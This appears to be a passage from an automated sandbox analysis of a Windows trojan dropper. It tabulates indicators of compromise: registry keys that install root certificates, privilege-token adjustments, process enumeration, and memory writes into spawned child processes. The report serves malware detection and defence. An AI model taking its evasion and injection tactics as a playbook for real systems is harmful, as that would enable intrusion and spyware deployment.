Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-412 = "E. Africa Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-731 = "Fiji Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-981 = "Kamchatka Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-32 = "Mid-Atlantic Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-142 = "Canada Central Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-251 = "Dateline Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-434 = "Georgian Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-501 = "Nepal Daylight Time"	Graphics.exe

Modifies system certificate store 2 TTPs 10 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

patch.execsrss.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 1400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a32000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 040000000100000010000000e4a68ac854ac5242460afd72481b2a440f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a41400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f392000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 19000000010000001000000014c3bd3549ee225aece13734ad8ca0b81400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3040000000100000010000000e4a68ac854ac5242460afd72481b2a442000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	patch.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4	csrss.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	csrss.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 0f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	patch.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25	patch.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

pub2.exeGraphics.exe

pid	process
1568	pub2.exe
1568	pub2.exe
1296
1296
1296
1296
1296
1296
1296
1296
1296
1296
1296
1296
1296
1296
1296
1008	Graphics.exe
1296
1296
1296
1296
1296
1296
1296
1296
1296
1296
1296
1296
1296
1296
1296
1296
1296
1296
1296
1296
1296
1296
1296
1296
1296
1296
1296
1296
1296
1296
1296
1296
1296
1296
1296
1296
1296
1296
1296
1296
1296
1296
1296
1296
1296
1296

Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

pub2.exe

pid process

1568 pub2.exe

Suspicious use of AdjustPrivilegeToken 40 IoCs

Processes:

Install.exemd9_1sjm.exeSoCleanInst.exetaskkill.exeGraphics.execsrss.exe

description	pid	process
Token: SeCreateTokenPrivilege	872	Install.exe
Token: SeAssignPrimaryTokenPrivilege	872	Install.exe
Token: SeLockMemoryPrivilege	872	Install.exe
Token: SeIncreaseQuotaPrivilege	872	Install.exe
Token: SeMachineAccountPrivilege	872	Install.exe
Token: SeTcbPrivilege	872	Install.exe
Token: SeSecurityPrivilege	872	Install.exe
Token: SeTakeOwnershipPrivilege	872	Install.exe
Token: SeLoadDriverPrivilege	872	Install.exe
Token: SeSystemProfilePrivilege	872	Install.exe
Token: SeSystemtimePrivilege	872	Install.exe
Token: SeProfSingleProcessPrivilege	872	Install.exe
Token: SeIncBasePriorityPrivilege	872	Install.exe
Token: SeCreatePagefilePrivilege	872	Install.exe
Token: SeCreatePermanentPrivilege	872	Install.exe
Token: SeBackupPrivilege	872	Install.exe
Token: SeRestorePrivilege	872	Install.exe
Token: SeShutdownPrivilege	872	Install.exe
Token: SeDebugPrivilege	872	Install.exe
Token: SeAuditPrivilege	872	Install.exe
Token: SeSystemEnvironmentPrivilege	872	Install.exe
Token: SeChangeNotifyPrivilege	872	Install.exe
Token: SeRemoteShutdownPrivilege	872	Install.exe
Token: SeUndockPrivilege	872	Install.exe
Token: SeSyncAgentPrivilege	872	Install.exe
Token: SeEnableDelegationPrivilege	872	Install.exe
Token: SeManageVolumePrivilege	872	Install.exe
Token: SeImpersonatePrivilege	872	Install.exe
Token: SeCreateGlobalPrivilege	872	Install.exe
Token: 31	872	Install.exe
Token: 32	872	Install.exe
Token: 33	872	Install.exe
Token: 34	872	Install.exe
Token: 35	872	Install.exe
Token: SeManageVolumePrivilege	768	md9_1sjm.exe
Token: SeDebugPrivilege	520	SoCleanInst.exe
Token: SeDebugPrivilege	1464	taskkill.exe
Token: SeDebugPrivilege	1008	Graphics.exe
Token: SeImpersonatePrivilege	1008	Graphics.exe
Token: SeSystemEnvironmentPrivilege	840	csrss.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cfb27ba8ff3737c3d09c1909ec16b837515aab2eb8419bc800913dd0023324f0.exeFiles.exeInstall.execmd.exeGraphics.execmd.exe

description	pid	process	target process
PID 1968 wrote to memory of 520	1968	cfb27ba8ff3737c3d09c1909ec16b837515aab2eb8419bc800913dd0023324f0.exe	SoCleanInst.exe
PID 1968 wrote to memory of 520	1968	cfb27ba8ff3737c3d09c1909ec16b837515aab2eb8419bc800913dd0023324f0.exe	SoCleanInst.exe
PID 1968 wrote to memory of 520	1968	cfb27ba8ff3737c3d09c1909ec16b837515aab2eb8419bc800913dd0023324f0.exe	SoCleanInst.exe
PID 1968 wrote to memory of 520	1968	cfb27ba8ff3737c3d09c1909ec16b837515aab2eb8419bc800913dd0023324f0.exe	SoCleanInst.exe
PID 1968 wrote to memory of 768	1968	cfb27ba8ff3737c3d09c1909ec16b837515aab2eb8419bc800913dd0023324f0.exe	md9_1sjm.exe
PID 1968 wrote to memory of 768	1968	cfb27ba8ff3737c3d09c1909ec16b837515aab2eb8419bc800913dd0023324f0.exe	md9_1sjm.exe
PID 1968 wrote to memory of 768	1968	cfb27ba8ff3737c3d09c1909ec16b837515aab2eb8419bc800913dd0023324f0.exe	md9_1sjm.exe
PID 1968 wrote to memory of 768	1968	cfb27ba8ff3737c3d09c1909ec16b837515aab2eb8419bc800913dd0023324f0.exe	md9_1sjm.exe
PID 1968 wrote to memory of 1468	1968	cfb27ba8ff3737c3d09c1909ec16b837515aab2eb8419bc800913dd0023324f0.exe	Folder.exe
PID 1968 wrote to memory of 1468	1968	cfb27ba8ff3737c3d09c1909ec16b837515aab2eb8419bc800913dd0023324f0.exe	Folder.exe
PID 1968 wrote to memory of 1468	1968	cfb27ba8ff3737c3d09c1909ec16b837515aab2eb8419bc800913dd0023324f0.exe	Folder.exe
PID 1968 wrote to memory of 1468	1968	cfb27ba8ff3737c3d09c1909ec16b837515aab2eb8419bc800913dd0023324f0.exe	Folder.exe
PID 1968 wrote to memory of 1008	1968	cfb27ba8ff3737c3d09c1909ec16b837515aab2eb8419bc800913dd0023324f0.exe	Graphics.exe
PID 1968 wrote to memory of 1008	1968	cfb27ba8ff3737c3d09c1909ec16b837515aab2eb8419bc800913dd0023324f0.exe	Graphics.exe
PID 1968 wrote to memory of 1008	1968	cfb27ba8ff3737c3d09c1909ec16b837515aab2eb8419bc800913dd0023324f0.exe	Graphics.exe
PID 1968 wrote to memory of 1008	1968	cfb27ba8ff3737c3d09c1909ec16b837515aab2eb8419bc800913dd0023324f0.exe	Graphics.exe
PID 1968 wrote to memory of 1164	1968	cfb27ba8ff3737c3d09c1909ec16b837515aab2eb8419bc800913dd0023324f0.exe	Updbdate.exe
PID 1968 wrote to memory of 1164	1968	cfb27ba8ff3737c3d09c1909ec16b837515aab2eb8419bc800913dd0023324f0.exe	Updbdate.exe
PID 1968 wrote to memory of 1164	1968	cfb27ba8ff3737c3d09c1909ec16b837515aab2eb8419bc800913dd0023324f0.exe	Updbdate.exe
PID 1968 wrote to memory of 1164	1968	cfb27ba8ff3737c3d09c1909ec16b837515aab2eb8419bc800913dd0023324f0.exe	Updbdate.exe
PID 1968 wrote to memory of 872	1968	cfb27ba8ff3737c3d09c1909ec16b837515aab2eb8419bc800913dd0023324f0.exe	Install.exe
PID 1968 wrote to memory of 872	1968	cfb27ba8ff3737c3d09c1909ec16b837515aab2eb8419bc800913dd0023324f0.exe	Install.exe
PID 1968 wrote to memory of 872	1968	cfb27ba8ff3737c3d09c1909ec16b837515aab2eb8419bc800913dd0023324f0.exe	Install.exe
PID 1968 wrote to memory of 872	1968	cfb27ba8ff3737c3d09c1909ec16b837515aab2eb8419bc800913dd0023324f0.exe	Install.exe
PID 1968 wrote to memory of 872	1968	cfb27ba8ff3737c3d09c1909ec16b837515aab2eb8419bc800913dd0023324f0.exe	Install.exe
PID 1968 wrote to memory of 872	1968	cfb27ba8ff3737c3d09c1909ec16b837515aab2eb8419bc800913dd0023324f0.exe	Install.exe
PID 1968 wrote to memory of 872	1968	cfb27ba8ff3737c3d09c1909ec16b837515aab2eb8419bc800913dd0023324f0.exe	Install.exe
PID 1968 wrote to memory of 2020	1968	cfb27ba8ff3737c3d09c1909ec16b837515aab2eb8419bc800913dd0023324f0.exe	Files.exe
PID 1968 wrote to memory of 2020	1968	cfb27ba8ff3737c3d09c1909ec16b837515aab2eb8419bc800913dd0023324f0.exe	Files.exe
PID 1968 wrote to memory of 2020	1968	cfb27ba8ff3737c3d09c1909ec16b837515aab2eb8419bc800913dd0023324f0.exe	Files.exe
PID 1968 wrote to memory of 2020	1968	cfb27ba8ff3737c3d09c1909ec16b837515aab2eb8419bc800913dd0023324f0.exe	Files.exe
PID 1968 wrote to memory of 1568	1968	cfb27ba8ff3737c3d09c1909ec16b837515aab2eb8419bc800913dd0023324f0.exe	pub2.exe
PID 1968 wrote to memory of 1568	1968	cfb27ba8ff3737c3d09c1909ec16b837515aab2eb8419bc800913dd0023324f0.exe	pub2.exe
PID 1968 wrote to memory of 1568	1968	cfb27ba8ff3737c3d09c1909ec16b837515aab2eb8419bc800913dd0023324f0.exe	pub2.exe
PID 1968 wrote to memory of 1568	1968	cfb27ba8ff3737c3d09c1909ec16b837515aab2eb8419bc800913dd0023324f0.exe	pub2.exe
PID 1968 wrote to memory of 972	1968	cfb27ba8ff3737c3d09c1909ec16b837515aab2eb8419bc800913dd0023324f0.exe	File.exe
PID 1968 wrote to memory of 972	1968	cfb27ba8ff3737c3d09c1909ec16b837515aab2eb8419bc800913dd0023324f0.exe	File.exe
PID 1968 wrote to memory of 972	1968	cfb27ba8ff3737c3d09c1909ec16b837515aab2eb8419bc800913dd0023324f0.exe	File.exe
PID 1968 wrote to memory of 972	1968	cfb27ba8ff3737c3d09c1909ec16b837515aab2eb8419bc800913dd0023324f0.exe	File.exe
PID 2020 wrote to memory of 1564	2020	Files.exe	jfiag3g_gg.exe
PID 2020 wrote to memory of 1564	2020	Files.exe	jfiag3g_gg.exe
PID 2020 wrote to memory of 1564	2020	Files.exe	jfiag3g_gg.exe
PID 2020 wrote to memory of 1564	2020	Files.exe	jfiag3g_gg.exe
PID 872 wrote to memory of 1924	872	Install.exe	cmd.exe
PID 872 wrote to memory of 1924	872	Install.exe	cmd.exe
PID 872 wrote to memory of 1924	872	Install.exe	cmd.exe
PID 872 wrote to memory of 1924	872	Install.exe	cmd.exe
PID 1924 wrote to memory of 1464	1924	cmd.exe	taskkill.exe
PID 1924 wrote to memory of 1464	1924	cmd.exe	taskkill.exe
PID 1924 wrote to memory of 1464	1924	cmd.exe	taskkill.exe
PID 1924 wrote to memory of 1464	1924	cmd.exe	taskkill.exe
PID 2020 wrote to memory of 1528	2020	Files.exe	jfiag3g_gg.exe
PID 2020 wrote to memory of 1528	2020	Files.exe	jfiag3g_gg.exe
